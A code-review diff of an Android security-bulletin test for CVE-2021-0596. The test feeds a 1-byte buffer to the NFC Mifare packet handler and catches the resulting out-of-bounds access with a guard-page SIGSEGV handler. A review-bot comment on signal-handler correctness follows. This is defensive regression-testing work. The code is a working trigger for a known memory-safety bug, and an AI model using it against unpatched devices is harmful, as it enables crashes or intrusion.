Diffstat (limited to 'hostsidetests/securitybulletin/securityPatch/CVE-2021-0596/poc.cpp')
-rw-r--r-- | hostsidetests/securitybulletin/securityPatch/CVE-2021-0596/poc.cpp | 37 |
1 files changed, 33 insertions, 4 deletions
diff --git a/hostsidetests/securitybulletin/securityPatch/CVE-2021-0596/poc.cpp b/hostsidetests/securitybulletin/securityPatch/CVE-2021-0596/poc.cpp
index 9b250044e38..3b1a58014a3 100644
--- a/hostsidetests/securitybulletin/securityPatch/CVE-2021-0596/poc.cpp
+++ b/hostsidetests/securitybulletin/securityPatch/CVE-2021-0596/poc.cpp
@@ -15,21 +15,50 @@
 *
 */
+#include <unistd.h>
 #include "phNxpExtns_MifareStd.h"
+#include "../includes/common.h"
+#include "../includes/memutils.h"
+char enable_selective_overload = ENABLE_NONE;
+char *vulnPtr = nullptr;
+bool testInProgress = false;
+struct sigaction new_action, old_action;
+void sigsegv_handler(int signum, siginfo_t *info, void* context) {
+ if (testInProgress && info->si_signo == SIGSEGV) {
+ size_t pageSize = getpagesize();
+ if (pageSize) {
+ char *vulnPtrGuardPage = (char *) ((size_t) vulnPtr & PAGE_MASK) - pageSize;
+ char *faultPage = (char *) ((size_t) info->si_addr & PAGE_MASK);
+ if (faultPage == vulnPtrGuardPage) {
+ (*old_action.sa_sigaction)(signum, info, context);
+ return;
+ }
+ }
+ }
+ _exit(EXIT_FAILURE);
+}
 uint8_t NFC_GetNCIVersion() {
 return NCI_VERSION_2_0;
 }
 int main() {
- uint8_t *buffer = (uint8_t*) malloc(16 * sizeof(uint8_t));
- if (buffer == nullptr) {
- return EXIT_FAILURE;
- }
+ sigemptyset(&new_action.sa_mask);
+ new_action.sa_flags = SA_SIGINFO;
+ new_action.sa_sigaction = sigsegv_handler;
+ sigaction(SIGSEGV, &new_action, &old_action);
+ enable_selective_overload = ENABLE_MEMALIGN_CHECK;
+ uint8_t *buffer = (uint8_t*) memalign(16, 16 * sizeof(uint8_t));
+ enable_selective_overload = ENABLE_FREE_CHECK | ENABLE_REALLOC_CHECK;
+ FAIL_CHECK(buffer);
+
+ vulnPtr = (char *) buffer;
 uint8_t bufferSize = 1;
 buffer[0] = 0x10;
 phNxpExtns_MfcModuleInit();
+ testInProgress = true;
 Mfc_RecvPacket(buffer, bufferSize);
+ testInProgress = false;
 free(buffer);
 return EXIT_SUCCESS;
 } |
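Review bot: The `sigaction(SIGSEGV, &new_action, &old_action)` call in main() is unchecked, so if it fails the guard-page handler is silently not installed and old_action holds whatever was in the uninitialized-looking global, yet the test goes on to rely on both; change it to `if (sigaction(SIGSEGV, &new_action, &old_action) != 0) return EXIT_FAILURE;`. In sigsegv_handler the forward `(*old_action.sa_sigaction)(signum, info, context)` is only valid when the previous disposition was itself installed with SA_SIGINFO; if it was SIG_DFL or a plain `sa_handler`, this calls through the wrong union member, so guard it with `if (old_action.sa_flags & SA_SIGINFO)` and otherwise fall through to the `_exit(EXIT_FAILURE)` path (or restore the default and re-raise). Whether memutils.h installs an SA_SIGINFO handler before main() runs cannot be seen from this hunk, so that assumption deserves a comment on the forward. A short header comment on sigsegv_handler would also help, e.g. `// Only a fault on the guard page directly below vulnPtr counts as the expected detection; any other SIGSEGV during the test is a hard failure.`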